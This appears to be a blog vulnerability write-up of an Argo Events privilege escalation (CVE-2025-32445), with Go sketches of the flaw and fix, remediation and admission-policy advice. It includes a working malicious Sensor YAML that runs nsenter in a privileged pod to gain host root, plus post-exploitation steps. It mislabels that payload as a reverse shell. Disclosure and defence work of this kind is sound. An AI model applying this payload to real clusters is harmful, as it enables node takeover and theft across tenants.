Feb 24, 2026 · 6 min read
Argo Events lets users define too much in their Custom Resources. An attacker with permission to create a 'Sensor' can override the container command, enable 'privileged' mode, and mount the host filesystem. This grants root access to the underlying node, bypassing all cluster RBAC.
A critical privilege escalation vulnerability in Argo Events allows low-privileged users to hijack the pod specifications of EventSources and Sensors. By manipulating the 'template' field, attackers can inject arbitrary commands and security contexts, effectively turning a standard automation workflow into a privileged root shell on the Kubernetes node.
Argo Events is the Rube Goldberg machine of the Kubernetes world. It's the glue that says, 'When a file drops in S3, spin up a workflow.' It relies on two main components: EventSources (the ears) and Sensors (the hands). To do their job, these components often need to spawn pods—little worker bees that listen for signals or trigger actions.
Here is where the philosophy of 'Configuration as Code' runs headfirst into a brick wall of security reality. The developers wanted flexibility. They wanted users to be able to define exactly how these worker pods should look. Maybe you need a specific environment variable, or you need to tweak the memory limit. That sounds reasonable, right?
But in the world of exploits, flexibility is just another word for 'attack surface.' The vulnerability we are looking at today, CVE-2025-32445, is a classic case of a developer trusting the user too much. They handed over the keys to the pod specification, not realizing that the user wouldn't just adjust the AC—they'd replace the engine with a pipe bomb.
The root cause here is a tale as old as Go programming itself: Struct Reuse. When defining the Custom Resource Definitions (CRDs) for EventSource and Sensor, the Argo team needed a way to describe the container that would eventually run. Instead of defining a safe, limited subset of fields, they imported the heavy artillery: the standard Kubernetes io.k8s.api.core.v1.Container struct.
This struct is the kitchen sink. It contains everything a pod can possibly do. It includes image, resources, and ports. But it also includes command (the entrypoint), args (the arguments), securityContext (where the privileged flag lives), and volumeMounts.
When the Argo Events controller reconciles your Sensor, it takes your YAML and merges it into the pod it's about to create. Because the code didn't sanitize this input, it blindly accepts your overrides. If you tell the controller, 'Hey, run this Sensor, but instead of the Argo binary, run /bin/sh and give me root capabilities,' the controller happily obliges. It creates a pod running as the controller's service account (or the specified user), but with your execution logic.
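To make the flaw concrete, here is a minimal Go sketch of that naive merge pattern. The types and the `buildPod` function are simplified stand-ins, not the actual Argo Events source; the point is that every user-set field, including `Command`, wins over the controller's defaults.

```go
package main

import "fmt"

// Simplified stand-ins for the Kubernetes core/v1 types — illustrative only.
type Container struct {
	Image      string
	Command    []string // attacker-controllable entrypoint
	Args       []string
	Privileged bool // stands in for SecurityContext.Privileged
}

type SensorSpec struct {
	Template Container // user-supplied spec.template.container
}

// buildPod mirrors the vulnerable reconciliation: the controller copies the
// user's container spec into the pod it creates without sanitizing anything.
func buildPod(spec SensorSpec) Container {
	c := Container{
		Image:   "argoproj/sensor:latest", // controller default (illustrative)
		Command: []string{"/bin/sensor"},
	}
	// Naive merge: any field the user set overrides the default, including Command.
	if spec.Template.Image != "" {
		c.Image = spec.Template.Image
	}
	if len(spec.Template.Command) > 0 {
		c.Command = spec.Template.Command // hijack point
	}
	if len(spec.Template.Args) > 0 {
		c.Args = spec.Template.Args
	}
	c.Privileged = spec.Template.Privileged
	return c
}

func main() {
	malicious := SensorSpec{Template: Container{
		Image:      "python:3.9-alpine",
		Command:    []string{"/bin/sh"},
		Args:       []string{"-c", "nsenter -t 1 -m -u -n -i -- sh"},
		Privileged: true,
	}}
	pod := buildPod(malicious)
	fmt.Println(pod.Command[0], pod.Privileged) // the controller runs our shell
}
```

The merge itself is perfectly ordinary Go; the bug is that the schema ever allowed these fields to reach it.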
Let's look at the fix to understand the break. The patch, authored in commit 18412293a699f559848b00e6e459c9ce2de0d3e2, explicitly rips out the standard Kubernetes container definition and replaces it with a sanitized, local version.
Before (The Vulnerable Logic): The code likely used a direct embedding or reference to the K8s Core V1 Container. This meant the Go struct had JSON tags mapping to every dangerous field available in the Kubernetes API.
After (The Fix):
The developers introduced a new type, io.argoproj.events.v1alpha1.Container. Crucially, notice what is missing:
```go
// New restricted container struct
type Container struct {
	// Image is removed or strictly controlled
	// Command and Args are GONE
	Env             []corev1.EnvVar             `json:"env,omitempty" protobuf:"bytes,7,rep,name=env"`
	Resources       corev1.ResourceRequirements `json:"resources,omitempty" protobuf:"bytes,8,opt,name=resources"`
	VolumeMounts    []corev1.VolumeMount        `json:"volumeMounts,omitempty" protobuf:"bytes,9,rep,name=volumeMounts"`
	SecurityContext *corev1.SecurityContext     `json:"securityContext,omitempty" protobuf:"bytes,15,opt,name=securityContext"`
	// ...
}
```

Wait, did you catch that? `SecurityContext` and `VolumeMounts` are actually still there in the struct definition in some contexts, but the validation logic and the removal of `command`/`args` neuter the attack. By removing `command` and `args` from the accepted schema, an attacker can no longer change what the program runs. Even if they mount the host filesystem, they are stuck running the Argo binary, which (hopefully) doesn't have a feature to 'cat /etc/shadow'.
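The practical effect is that the controller, not the user, owns the pod's entrypoint. Here's a minimal sketch of that post-patch behavior, with hypothetical simplified types (not the actual Argo Events code): the copy function only carries over whitelisted fields, so the pod always runs the Argo binary.

```go
package main

import "fmt"

// Hypothetical simplified types — a sketch of the patched behavior,
// not the real v1alpha1 definitions.
type RestrictedContainer struct {
	Env map[string]string // tuning knobs the user may still set
}

type PodContainer struct {
	Image   string
	Command []string
	Env     map[string]string
}

// buildSensorPod copies only whitelisted fields from the user's spec;
// the image and entrypoint are owned by the controller and cannot be
// overridden, so the resulting pod always runs the Argo binary.
func buildSensorPod(user RestrictedContainer) PodContainer {
	return PodContainer{
		Image:   "quay.io/argoproj/sensor:latest", // controller default (illustrative)
		Command: []string{"/bin/sensor"},          // never user-influenced
		Env:     user.Env,
	}
}

func main() {
	pod := buildSensorPod(RestrictedContainer{Env: map[string]string{"LOG_LEVEL": "debug"}})
	fmt.Println(pod.Command) // always the Argo binary
}
```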
The most critical change is that the API server will now reject CRs containing the command field because it no longer exists in the OpenAPI schema definition for the CRD.
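To see why removing a field from the schema is such a clean control, here's a small Go sketch using `encoding/json`'s `DisallowUnknownFields` as a stand-in for the API server's structural schema validation (the real enforcement happens server-side against the CRD's OpenAPI schema; the field names here are illustrative):

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
)

// The restricted schema: note there is no Command or Args field at all.
type RestrictedContainer struct {
	Image string            `json:"image,omitempty"`
	Env   map[string]string `json:"env,omitempty"`
}

// strictDecode mimics schema validation: any field that doesn't exist in
// the struct (e.g. "command") makes decoding fail outright.
func strictDecode(raw []byte) (*RestrictedContainer, error) {
	dec := json.NewDecoder(bytes.NewReader(raw))
	dec.DisallowUnknownFields()
	var c RestrictedContainer
	if err := dec.Decode(&c); err != nil {
		return nil, err
	}
	return &c, nil
}

func main() {
	benign := []byte(`{"image":"python:3.9-alpine"}`)
	malicious := []byte(`{"image":"python:3.9-alpine","command":["/bin/sh"]}`)

	if _, err := strictDecode(benign); err == nil {
		fmt.Println("benign spec accepted")
	}
	if _, err := strictDecode(malicious); err != nil {
		fmt.Println("malicious spec rejected:", err)
	}
}
```

The attacker's YAML never reaches the controller at all; it dies at admission time with a schema error.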
Let's assume you are a developer with restricted access. You can't create Pods directly (because your admin isn't stupid), but you can create Argo Sensors to manage your workflows. That is all we need.
We are going to craft a Sensor that hijacks the pod template. We will overwrite the command to spawn a reverse shell, but to make it juicy, we will also ask for privileged: true. This allows us to access the host's devices.
The Payload:

```yaml
apiVersion: argoproj.io/v1alpha1
kind: Sensor
metadata:
  name: trojan-sensor
spec:
  template:
    serviceAccountName: default
    container:
      # The Override
      image: python:3.9-alpine
      command: ["/bin/sh"]
      args: ["-c", "nsenter -t 1 -m -u -n -i -- sh"]
      securityContext:
        privileged: true
```

The Execution Chain:

1. The controller reads `spec.template`. It doesn't validate the command. It generates a Pod manifest merging our malicious config.
2. Because `privileged: true` is set, the container runtime disables security isolation.
3. The `nsenter` command in our args allows us to break out of the container namespace and enter the host's PID 1 namespace. We are now effectively root on the Kubernetes node.

From here, it's game over. We can grab the kubelet credentials, talk to the API server, or dump secrets from other pods running on the same node.
The CVSS score is 9.9 for a reason. This is not a Denial of Service. This is a complete compromise of the compute node. In a Kubernetes environment, the security boundary is usually the Namespace. This vulnerability shatters that boundary.
If you are running a multi-tenant cluster where Team A shouldn't see Team B's data, this bug destroys that guarantee. An attacker in Team A uses this exploit to become Node Root. Once they are Node Root, they can inspect the memory and disk of any container running on that node—including Team B's database or the cluster's ingress controller.
Furthermore, if the node has high-privilege Service Accounts mounted (like a CI/CD runner or a monitoring agent), the attacker can steal those tokens and pivot laterally to compromise the entire cluster control plane. This is a 'Cluster Admin via Lateral Movement' vector.
The remediation is straightforward: Update to Argo Events v1.9.6. The patch restricts the CRD schema, meaning the Kubernetes API server will physically reject any YAML that tries to slip in a command or args field. It's a hard schema validation failure.
Defense in Depth:
If you cannot patch immediately, or if you just want to sleep better at night, you should be using Admission Controllers like Kyverno or OPA Gatekeeper. You should have a policy that strictly forbids the creation of Sensors or EventSources that contain securityContext.privileged: true or hostPath mounts.
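The core of such a policy is simple to express. Here's a hedged Go sketch of the check a Kyverno or Gatekeeper rule would perform; the types and field names are simplified stand-ins for the pod template an admission webhook would inspect, not a real admission API:

```go
package main

import "fmt"

// Simplified stand-ins for the parts of a pod template a policy inspects.
type SecurityContext struct {
	Privileged bool
}

type Volume struct {
	HostPath string // non-empty means a hostPath mount
}

type PodTemplate struct {
	SecurityContext SecurityContext
	Volumes         []Volume
}

// violations returns the policy failures for a Sensor/EventSource pod
// template: privileged containers and hostPath mounts are forbidden.
func violations(t PodTemplate) []string {
	var v []string
	if t.SecurityContext.Privileged {
		v = append(v, "securityContext.privileged must not be true")
	}
	for _, vol := range t.Volumes {
		if vol.HostPath != "" {
			v = append(v, "hostPath volumes are forbidden: "+vol.HostPath)
		}
	}
	return v
}

func main() {
	bad := PodTemplate{
		SecurityContext: SecurityContext{Privileged: true},
		Volumes:         []Volume{{HostPath: "/"}},
	}
	for _, msg := range violations(bad) {
		fmt.Println("DENY:", msg)
	}
}
```

An admission controller running logic like this would have blocked the trojan Sensor above even on a vulnerable Argo Events version.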
> [!NOTE]
> Relying on the application to validate input is always a secondary control. The primary control should be the Kubernetes Admission layer, which can catch these bad configurations regardless of which buggy controller tries to create them.
`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Argo Events (Argo Project) | < 1.9.6 | 1.9.6 |
| Attribute | Detail |
|---|---|
| Attack Vector | Network (via K8s API) |
| CVSS v3.1 | 9.9 (Critical) |
| Privileges Required | Low (Create/Edit Sensor CRs) |
| Impact | Cluster Node Compromise / Container Escape |
| CWE | CWE-250: Execution with Unnecessary Privileges |
| Exploit Status | PoC Available / High Likelihood |
The product performs an operation at a privilege level that is higher than the minimum level required, which creates new security weaknesses.